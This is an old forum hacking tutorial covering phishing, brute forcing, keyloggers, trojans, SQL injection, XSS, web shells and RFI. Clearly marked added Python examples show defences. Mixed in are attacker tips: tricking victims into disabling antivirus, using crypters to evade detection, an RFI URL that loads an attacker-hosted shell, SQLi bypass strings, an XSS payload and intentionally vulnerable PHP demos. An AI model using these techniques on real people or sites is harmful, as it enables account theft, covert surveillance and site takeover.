Complete HACKING information

Introduction:

We see millions of people going to different forums and websites asking “how do I hack an email?” and “Can you hack blah for me?”. So I thought to create a tutorial which gives you the basic idea of what the heck a “HACK” is, and how to DEFEND YOURSELF AGAINST HACKERS.

Disclaimer:

As I have seen controversies in the past, here is the disclaimer.

Neither I nor the staff of Go4expert.com take any responsibility if you use this tutorial in an unethical way. This is written to help you be aware of what's going around, and to save yourself from being hacked!

Background:

Hacking started way back when Windows 98 was designed. Hacking is basically finding loopholes and trying to leak some information out of them, which may lead you to critical information like passwords or credit card details. Sometimes hacking is done just because of personal offences.

Things to remember

I will suggest to you: KEEP READING ARTICLES AND TUTORIALS FROM GOOD SITES. THAT'S THE ONLY WAY YOU CAN LEARN.

Initialization:

Getting back to the main point, I am going to discuss some of the ways of hacking in brief. Hacking is basically bifurcated into 2 major parts.

1. Email or the user information
2. Web based hacking.

Email or user information:

These days the most commonly used and famous ways of hacking user information like emails, passwords and credit card details are as follows:

a. Phishing
b. Brute Forcing
c. Keylogging
d. Trojans

a. Phishing:

Phishing is basically a massive attack. What a hacker does is create an absolutely look-alike page of some website like Yahoo or Gmail, upload it to their own server, and give the link to some n00b user. When they open it, they think they are on the Yahoo or Gmail page, they put in their username and password, click on submit and WHOA! your information has been submitted. This is widely used by new people trying to enter the hacking world.
The most recent example in India was some scam with ICICI bank; lots of user info was stolen as far as I remember. I read it somewhere in the newspaper and was thinking, what the hell!?

Disadvantages: Still, many people hesitate before going for phishing, because the only problem with phishing is that even if the victim knows a little about the internet, he will read the URL and understand that it is not a genuine website.

b. Brute Forcing

A brute forcer is basically a program which could be called a “cracker”. In a brute forcer you put in the username you want to hack, and as the password you give it a notepad file which has almost all of the existing English words in it. What it does is try each and every word from that file and see if anything matches. You might have noticed some topics like “huge pass list” on different forums; they are nothing but password lists to put into your brute forcer!

Disadvantages:
1. Sometimes brute forcing may just go on for ages!
2. It isn't guaranteed.
3. These days many people have alphanumeric-plus-symbol passwords which are really tough for a brute forcer to find.
4. Most of the famous sites like Yahoo and Gmail are designed in such a way that they put up an “image captcha” after 3 incorrect login attempts, which stops the brute forcer.

P.S.:- I have made some focused FTP, Gmail & Yahoo bruteforcers which are available on my website.
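The fourth disadvantage above is the one a site owner actually controls: count failed logins per account and demand a CAPTCHA (or a delay) once the count reaches 3. The following is an added Python example, not code from the tutorial or from Go4expert, of that server-side counter as a sliding window. The 15-minute window, the account and wordlist values are all constructed for the demo, and `expected` stands in for whatever the real system verifies against (normally a stored password hash).

```python
import hmac
import time
from collections import defaultdict, deque

MAX_FAILURES = 3           # the tutorial's figure: a CAPTCHA after 3 wrong attempts
WINDOW_SECONDS = 15 * 60   # assumed policy value; failures older than this are forgotten


class LoginThrottle:
    """Sliding-window count of failed logins per account name.

    Keying on the account (not the client IP) is what defeats a wordlist run
    against one username: the account drops into CAPTCHA mode no matter where
    the guesses come from."""

    def __init__(self, max_failures=MAX_FAILURES, window=WINDOW_SECONDS, clock=time.monotonic):
        self.max_failures = max_failures
        self.window = window
        self.clock = clock                      # injectable so tests can fake time
        self._failures = defaultdict(deque)     # account -> timestamps of recent failures

    def _recent(self, account, now):
        q = self._failures[account]
        while q and now - q[0] > self.window:   # drop failures that fell out of the window
            q.popleft()
        return q

    def captcha_required(self, account):
        return len(self._recent(account, self.clock())) >= self.max_failures

    def record_failure(self, account):
        now = self.clock()
        self._recent(account, now).append(now)

    def record_success(self, account):
        self._failures.pop(account, None)


def attempt_login(throttle, account, password, expected, captcha_solved=False):
    """Returns 'ok', 'denied' or 'captcha_required'.

    hmac.compare_digest is used so the comparison time does not leak how many
    leading characters of the guess were right."""
    if throttle.captcha_required(account) and not captcha_solved:
        return "captcha_required"
    if hmac.compare_digest(password.encode(), expected.encode()):
        throttle.record_success(account)
        return "ok"
    throttle.record_failure(account)
    return "denied"


def run_wordlist(throttle, account, expected, words):
    """Replay a wordlist against one account and collect the server's answer per guess;
    this is how you verify the throttle actually engages after MAX_FAILURES."""
    return [attempt_login(throttle, account, w, expected) for w in words]


# Constructed wordlist for the demo (the real lists the tutorial mentions are just longer)
SAMPLE_WORDS = ["password", "123456", "letmein", "qwerty", "dragon", "correct horse"]

if __name__ == "__main__":
    results = run_wordlist(LoginThrottle(), "admin", "correct horse", SAMPLE_WORDS)
    for word, result in zip(SAMPLE_WORDS, results):
        print(f"{word:15} -> {result}")
```

Note that the correct password is the sixth word in the list and is still answered with `captcha_required`: once the counter trips, even a right guess is not accepted until the CAPTCHA is solved, which is exactly what makes the dictionary run pointless.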

c. Keylogging

A keylogger helps you create a little file which is known as a “server”. You have to send your server to the victim; he has to click on it and then YOU'RE DONE! This is what happens.
Best possible way to hack someone. Keyloggers are basically programs which install themselves on your victim's computer, keep on recording each and every keystroke the victim presses on his keyboard, and send it to the hacker. There are many ways to receive the keystrokes, i.e. FTP, email, messengers. According to me this is the best way to trick your victim and get their information.

Disadvantages :
1. When the victim receives the keylogger, in most cases their antivirus would auto-delete it. So you have to convince them to disable the antivirus by bluffing something.
2. Sometimes a firewall blocks the keylogs from being sent.

Tips :
1. There are some programs known as “crypters” which help you make your servers undetectable, so your victim's antivirus would not be able to detect them.

d. Trojans:

Trojans are like the father of keyloggers. A trojan sends you the keylogs just like a keylogger; on top of that, it lets you take control of the victim's computer: edit / delete / upload / download files from or to their computer. Some more funny features: it will make their keyboard go mad, it may keep on ejecting and re-inserting the CD-ROM. Much more...

Disadvantages :
Same as keyloggers.

Tips :
Same as keylogger.

Web Hacking:

I will discuss some of the most commonly used web hacking techniques which help hackers hack any website. This will help you SAVE YOUR SITE!

1. SQL Injection
2. XSS
3. Shells
4. RFI
5. There are some more but they are TOOO big to be discussed in here.

1. SQL Injection:

Most websites these days are connected to an SQL database, which helps them store usernames and passwords [encrypted] when a guest registers on their website. The SQL database processes a query every time a user logs in. It goes to the database and validates the password; if it's correct then it logs the user in, and if not it gives an error.
So the basic funda is executing a command to parse a query in the database, to try to exploit the internal information of the database. I can't really put the entire tutorial here because this is the most complicated way to hack a website!

P.S.:- If you want to check whether YOUR website is vulnerable to SQL injection or not, then do the following.

If your site’s URL is:

Code:
 yoursite.com/index.php?id=545

just add a ' like this at the end

Code:
 yoursite.com/index.php?id=545'

2. XSS:

XSS is another nice way to hack some website. Suppose some website/forum allows HTML in posts or articles; then a hacker can post a malicious script into the content. So whenever a user opens up the page, the cookies are sent to the hacker, so he can log in as that user and f*ck the website up.

3. Shells:

A shell is a malicious .php script. What you have to do is find a place on any website where you can upload a file, like avatars, recipes, your tricks, your feedback, and try to upload your shell file from there. If it's uploaded then WHOA! You open it from the URL bar and you can see the entire “FTP” account of that web hosting. You can rename / edit / upload / download anything you want, including the index page.
This is also known as defacing.

4. RFI:

RFI is a good way to deface a website. It is used with a shell. Suppose you have uploaded your shell on:

Code:
 yoursite.com/shell.txt

and you found a site vulnerable to RFI... then you can do as follows:

Code:
 victimssite.com/index.php?page=yoursite.com/shell.txt

This will again give you access to your victim's site's FTP, just like a shell, so you can f*ck up anything you want.

P.S.:- If you want to check whether YOUR website is vulnerable to an RFI attack or not, then do the following.

If your site’s URL is:

Code:
 yoursite.com/index.php?id=545

just add something like this at the end

Code:
 yoursite.com/index.php?id=http://www.google.com

And if it includes the Google page into your page, that means it's vulnerable to RFI.

Reference : http://www.go4expert.com/forums/showthread.php?t=16514


Understanding Basic SQL Injection

SQL injection (also known as SQLi) is a code injection technique that occurs if user-supplied input is not correctly filtered or sanitized of the ‘string literal escape characters’ embedded in SQL.

Basically SQLi is a way of injecting and executing arbitrary SQL statements. The whole idea is to make the application execute our arbitrary code, which was never intended. In this tutorial we'll be looking at how a basic SQL code injection can cause the application to mess up its login authentication, which would eventually lead to data access. So what are we waiting for? Let's get started.

Authentication Bypass (SQL injection)

Most of the authentication scripts you'll find on the web are not secured, and although this vulnerability first appeared in the 1990s, there are still many applications vulnerable to this attack.

How does SQL injection work?

This attack simply exploits a bad filtering or sanitizing mechanism in the database layer of an application; this vulnerability gives attackers room to alter the SQL code that gets executed.

For example, you have a basic SQL statement as follows:-

Code:
  SELECT * FROM Users where Name = 'UserInput';

Now if the page is vulnerable to this kind of attack then an attacker has room to alter this SQL statement at will.
For example, the attacker can simply add

Code:
  ' or '1' = '1

Which would result in :-

Code:
  SELECT * FROM Users where Name = '' or '1' = '1'

Now if you know some basic SQL you can simply point out that the application will now be forced to return all the users in the table, as the statement now includes an OR condition, i.e. '1' = '1', which will always be true.

Demonstration

To demonstrate a basic SQL authentication bypass attack I have created a set of PHP scripts.

defines.php

Code:
  <?php
  $tableName = "badlogin";
  $dbName    = "sqlnjection";
  $sqlServer = "localhost";
  $sqlUser   = "root";
  $sqlPass   = "";
  ?>

functions.php

Code:
<?php
require "defines.php";

// Uses the legacy mysql_* extension (removed in PHP 7), as the original demo did.

// Creates the demo table on first use. There must be no die() on the probe query,
// otherwise createTable() could never run while the table is still missing.
function checkTable()
{
	global $tableName;
	$query = "SELECT * from $tableName";
	$result = mysql_query($query);
	if($result == FALSE) // Table has not been created yet
		createTable();
}
function createTable()
{
	global $tableName;
	$query = "CREATE TABLE $tableName(login char(50),pass char(50))";
	$result = mysql_query($query);
	// Plain-text password on purpose: this is the deliberately bad login
	$query = "INSERT INTO $tableName(login,pass) values('admin','UnCrACkAbLe')";
	$result = mysql_query($query);
}
// Intentionally vulnerable: $login and $pass are interpolated straight into the SQL
function checkCredentials($login,$pass)
{
	global $tableName;
	$query = "SELECT * FROM $tableName WHERE login='$login' AND pass='$pass';";
	//            echo "<br/>$query<br/>";
	$result = mysql_query($query) or die(mysql_error());
	$rowsnum = mysql_num_rows($result);
	if($rowsnum > 0)
	{
		congrats();
	}
}
function congrats()
{
	echo "<p class='warning'>Congratulations You just completed the Challenge...</p>";
	echo "<script type='text/javascript'>alert('Mission Completed');</script>";
	// The redirection and points award code should go here
}
?>

sqlInjection.php

Code:
<?php
require "defines.php";
require "functions.php";
?>
<html>
<head>
	<title>Bad Login</title>
	<link href='style.css' type='text/css' rel='stylesheet'/>
</head>
<body>
	<h1>Welcome to bad Login Please Enter your Credentials</h1>
	<form method="post" action="<?php echo $_SERVER['PHP_SELF']; ?>">
	<table align="center">
		<tr>
			<td>Login</td>
			<td> : <input type="text" name="login"/></td>
		</tr>
		<tr>
			<td>Password</td>
			<td> : <input type="text" name="email"/></td>
		</tr>	
		<tr>
			<td><input type="submit" name="go"/></td>
		</tr>
	</table>
	</form>
<?php
if( isset($_POST['login']) && isset($_POST['email']) && isset($_POST['go']) )
{
	// Note: the password box is posted under the field name "email" (see the form above)
	mysql_connect("$sqlServer","$sqlUser","$sqlPass") or die(mysql_error());
	mysql_select_db("$dbName") or die(mysql_error());
	checkTable(); // checks if the table exists and creates it if not found
	checkCredentials($_POST['login'],$_POST['email']);
}
?>

</body>
</html>

Constructing the Attack String :-

Our main purpose in this scenario is to exploit the vulnerability in the above set of pages and gain access to the ‘admin’ account. We can simply do that in the following ways:-

  1. Giving “admin'#” as the username to the application. This means that after writing admin as the username we use ‘#’ to comment out any other code after it.
  2. Giving “admin” as the username and “' or '1' = '1” as the password. This tricks the application into using an ‘or always true’ condition, which eventually results in an authentication bypass.
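What follows is an added Python example (not part of the tutorial, and not Go4expert code) that reproduces the `checkCredentials()` mistake beside the fix, using the standard-library `sqlite3` module as a stand-in for MySQL and an in-memory table seeded with the same `admin` / `UnCrACkAbLe` row. It demonstrates the second attack string from the list above; SQLite does not treat `#` as a comment marker the way MySQL does, so the first string is not demonstrated here. The `probe_raises_sql_error()` helper is the code form of the earlier "add a `'` to the parameter" self-check: on a string-built query the lone quote surfaces as a database syntax error, while on a parameterised query it is just a login name nobody has.

```python
import sqlite3


def setup_db():
    """Constructed in-memory stand-in for the page's 'badlogin' table, seeded with
    the same admin/UnCrACkAbLe row (plain-text passwords are part of the badness)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE badlogin (login TEXT, pass TEXT)")
    conn.execute("INSERT INTO badlogin (login, pass) VALUES ('admin', 'UnCrACkAbLe')")
    conn.commit()
    return conn


def build_vulnerable_query(login, pw):
    """String interpolation, the same mistake as checkCredentials(): quote characters
    typed by the user become part of the SQL grammar instead of staying data."""
    return f"SELECT * FROM badlogin WHERE login='{login}' AND pass='{pw}'"


def check_credentials_vulnerable(conn, login, pw):
    rows = conn.execute(build_vulnerable_query(login, pw)).fetchall()
    return len(rows) > 0


def check_credentials_safe(conn, login, pw):
    """Parameterised query: the driver sends the values separately from the
    statement, so nothing the user types can change the query's structure."""
    rows = conn.execute(
        "SELECT * FROM badlogin WHERE login=? AND pass=?", (login, pw)
    ).fetchall()
    return len(rows) > 0


def probe_raises_sql_error(conn, login):
    """The page's own self-check in code: does a lone quote in the input make the
    database choke? True means the query is being built from the raw string."""
    try:
        check_credentials_vulnerable(conn, login, "x")
    except sqlite3.OperationalError:
        return True
    return False


if __name__ == "__main__":
    db = setup_db()
    payload = "' or '1' = '1"
    print("SQL actually executed:", build_vulnerable_query("admin", payload))
    print("string-built login accepts the payload:", check_credentials_vulnerable(db, "admin", payload))
    print("parameterised login accepts the payload:", check_credentials_safe(db, "admin", payload))
    print("lone quote raises a DB error on the string-built query:", probe_raises_sql_error(db, "545'"))
```

The parameterised version is the whole fix: the `?` placeholders are filled in by the driver after the statement has been parsed, so `' or '1' = '1` is compared against the `pass` column as a literal 13-character string and matches nothing. Hashing the stored passwords is a separate problem the demo leaves as it is.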

 

Reference : http://www.go4expert.com/forums/showthread.php?t=26236

Basics of XSS or Cross Site Scripting Explained

Cross Site Scripting, also known as XSS, is a popular type of client-side attack. It occurs in web applications and allows an attacker to inject client-side scripts of their choosing into web pages viewed by others.

Types of XSS
This attack is mainly of 2 types:

Non-Persistent

This type of attack is carried out by injecting some client-side code into a vulnerable URL. The attacker can then spread this URL and send it to his/her victims by means of social engineering etc.; on clicking these links the victims unknowingly execute the injected code, which in turn can result in cookie stealing, privacy disclosure etc.

Persistent

This type of attack is more dangerous; it occurs when the data provided by the attacker is stored by the server and is served as a normal page to normal users.
The attacker can then simply inject some malicious client-side code which in turn can result in defacement of the website, cookie stealing, privacy disclosure etc.

Demo

Now that we know something about what these vulnerabilities are and how they occur, let's actually take a look at how they arise in code and how to test for them!
Xss.php

Code: php
<html>
<head>
<title>Vulnerable to XSS</title>
</head>
<body>
<h1>Welcome to XSS Demo Page</h1>

<p>The Data Entered is As Follows :- </p>

<?php

/**
* @author lionaneesh
* @copyright 2011
*/

// Intentionally vulnerable: the query-string value is echoed back into the page unescaped
if(isset($_GET['data']))
{
$data = $_GET['data'];
}
else
{
$data = "No Data Entered !";
}

echo "<i>$data</i>";

?>

</body>
</html>

Now Just Go to :-

Site.com/path/xss.php?data=<script>alert("XSS");</script>

And See what happens!

Wow! An alert box saying XSS appears, proving that your injected code actually executed! Now this is just an example of how these vulnerabilities can occur in web applications and how you can test for them!

How to Fix Them

If you're one of the people whose site is vulnerable to this type of attack, I recommend fixing it as soon as possible. For the scope of this tutorial I'll only be covering how these vulnerabilities can be fixed in PHP; if you are using some other language, I recommend you check your language reference or contact me.

PHP provides a function called htmlspecialchars() which converts special characters into their HTML entities. Now we'll just use this in the above code and check what happens.
Xss.php (line number 33)

Code: php
echo htmlspecialchars("<i>$data</i>");

Now let’s once more Go to :-

Site.com/path/xss.php?data=<script>alert("XSS");</script>

And See what happens!

Voila! You can notice the change now!
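The change you notice is that the `<i>` tags are now printed on screen as text too, because the fix above escapes the author's own markup along with the visitor's input. The rule is to escape the untrusted value only, at the point where it is placed into HTML. The following is an added Python example (not code from the tutorial or from Go4expert) that renders the same `<i>...</i>` fragment three ways: as Xss.php originally did, as the page's fix does, and with only `$data` escaped. Python's `html.escape()` with its default `quote=True` escapes `& < > " '`, which corresponds to PHP's `htmlspecialchars()` called with `ENT_QUOTES`; the `DEFAULT_TEXT` and payload values are taken from the page.

```python
import html

DEFAULT_TEXT = "No Data Entered !"  # same fallback as the page's Xss.php


def _data_or_default(data):
    return DEFAULT_TEXT if data is None else data


def render_vulnerable(data):
    """What Xss.php originally does: untrusted input goes straight into the markup."""
    return f"<i>{_data_or_default(data)}</i>"


def render_page_fix(data):
    """The tutorial's fix transliterated: the whole string, tags included, is escaped,
    so the italics are lost and '<i>' shows up literally on the page."""
    return html.escape(f"<i>{_data_or_default(data)}</i>")


def render_correct(data):
    """Escape only the untrusted value; the author's own markup stays intact and the
    browser can no longer see a <script> element in the output."""
    return "<i>" + html.escape(_data_or_default(data)) + "</i>"


def script_survives(rendered):
    """Crude sanity check used in the demo: did a <script tag reach the output?"""
    return "<script" in rendered.lower()


if __name__ == "__main__":
    payload = '<script>alert("XSS");</script>'   # the page's test string
    for name, fn in [("vulnerable", render_vulnerable),
                     ("page's fix", render_page_fix),
                     ("escape data only", render_correct)]:
        out = fn(payload)
        print(f"{name:17} script survives={script_survives(out)!s:5}  {out}")
```

One caveat for the PHP version: before PHP 8.1 `htmlspecialchars()` did not convert single quotes unless you passed `ENT_QUOTES`, so data placed inside a single-quoted attribute needed that flag explicitly. Escaping for HTML text is also not enough when the value lands inside a `<script>` block or a URL; each of those contexts has its own escaping rules.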

Reference : http://www.go4expert.com/forums/showthread.php?t=26878

How to check for open Ports?

Step 1:

Open up the command prompt: press “START”, then “RUN”, type “cmd” and use the command “netstat -a”.
Now you will get a list showing you the people who are connected to your computer. The list will look like this.

Proto: TCP
Local Address: thiscomputer3123:1031
Foreign Address: thiscomputerhaha342:ftp
State: ESTABLISHED

“Proto” shows what protocol it is; in this case it is TCP (Transmission Control Protocol).
“Local Address” is your computer; you also see a number after your computer name. 1031 is the port used by your computer.
“Foreign Address” is the remote computer, and the port is ftp (File Transfer Protocol), so the port is 21 since the default port for FTP is 21.
“State” shows you whether the computer is connected to you or not. ESTABLISHED means that it is connected to you.

So now you know how to read the result. Lets go to Step 2.

Step 2:

Ports:

0 – 1023 = These ports are used by “Services”.
1024 – 49151 = These ports are used by “Network”, e.g. your internet browser and e-mail clients.
49152 – 65535 = These ports are used by private users; they are rarely used, so this may indicate that you are infected with something.

Step 3:
You can easily check out the ports just by doing a Google search. Open up your internet browser, type “www.google.com” in the address bar and search for e.g. “Port 1031”; now it will give you sites about the “1031 port”, or you may search for a Trojan Horse port list or something like that to check whether the port is used by a Trojan Horse.
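Reading `netstat -a` by eye is fine for a handful of lines; on a busy machine you want the three steps above applied mechanically. The following is an added Python example, not part of the tutorial, that parses the Windows-style `netstat -a` rows, resolves named ports such as `ftp`, classifies each local port into the three ranges listed in Step 2, and returns the ESTABLISHED connections whose local port falls in the 49152–65535 range for you to look up in Step 3. The sample output is constructed for the demo, modelled on the page's example entry, and the `203.0.113.5:4444` peer is an invented documentation address.

```python
import re
import socket


def classify_port(port):
    """The tutorial's Step 2 ranges (IANA: well-known, registered, dynamic/private)."""
    if 0 <= port <= 1023:
        return "services"
    if 1024 <= port <= 49151:
        return "network"
    if 49152 <= port <= 65535:
        return "private"
    raise ValueError(f"not a TCP/UDP port: {port}")


# netstat prints some ports by name (the page's ":ftp"); resolve the common ones
# without depending on an /etc/services file being present on the machine
KNOWN_SERVICES = {"ftp": 21, "ssh": 22, "telnet": 23, "smtp": 25, "http": 80, "https": 443}


def port_number(token):
    if token == "*":                 # UDP rows show the wildcard "*:*" as the peer
        return None
    if token.isdigit():
        return int(token)
    if token in KNOWN_SERVICES:
        return KNOWN_SERVICES[token]
    return socket.getservbyname(token)   # fall back to the OS services database


# proto, host:port, host:port, optional state. The greedy \S+ means the LAST colon
# splits host from port, so bracketed IPv6 addresses parse as well.
LINE_RE = re.compile(r"^\s*(TCP|UDP)\s+(\S+):(\S+)\s+(\S+):(\S+)\s*(\S*)\s*$")


def parse_netstat(text):
    """Turn the data rows of `netstat -a` (Windows layout, as on the page) into dicts;
    headers and unrelated lines are skipped."""
    entries = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        proto, lhost, lport, fhost, fport, state = m.groups()
        entries.append({
            "proto": proto,
            "local_host": lhost, "local_port": port_number(lport),
            "foreign_host": fhost, "foreign_port": port_number(fport),
            "state": state,
        })
    return entries


def flag_suspicious(entries):
    """Step 2's rule as a filter: ESTABLISHED connections whose local port is in the
    private range are the ones the tutorial tells you to look up in Step 3."""
    return [e for e in entries
            if e["state"] == "ESTABLISHED" and classify_port(e["local_port"]) == "private"]


# Constructed sample output modelled on the page's example row (not real captured data)
SAMPLE_NETSTAT = """
Active Connections

  Proto  Local Address          Foreign Address          State
  TCP    thiscomputer3123:1031  thiscomputerhaha342:ftp  ESTABLISHED
  TCP    thiscomputer3123:135   thiscomputer3123:0       LISTENING
  TCP    thiscomputer3123:52000 203.0.113.5:4444         ESTABLISHED
  UDP    thiscomputer3123:137   *:*
"""

if __name__ == "__main__":
    rows = parse_netstat(SAMPLE_NETSTAT)
    for e in rows:
        print(f"{e['proto']} local {e['local_port']} ({classify_port(e['local_port'])}) "
              f"-> {e['foreign_host']}:{e['foreign_port']} {e['state']}")
    print("look these up:", [(e["local_port"], e["foreign_host"]) for e in flag_suspicious(rows)])
```

Caveat on the rule itself: since Windows Vista the default dynamic (ephemeral) port range for outgoing connections is exactly 49152–65535, so on any modern Windows box most ordinary browser connections will be flagged by this filter. The tutorial's advice fits the Windows XP era it was written in; today the foreign address and the owning process (`netstat -ano`) tell you far more than the local port number does.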

Reference : http://www.go4expert.com/forums/showthread.php?t=12222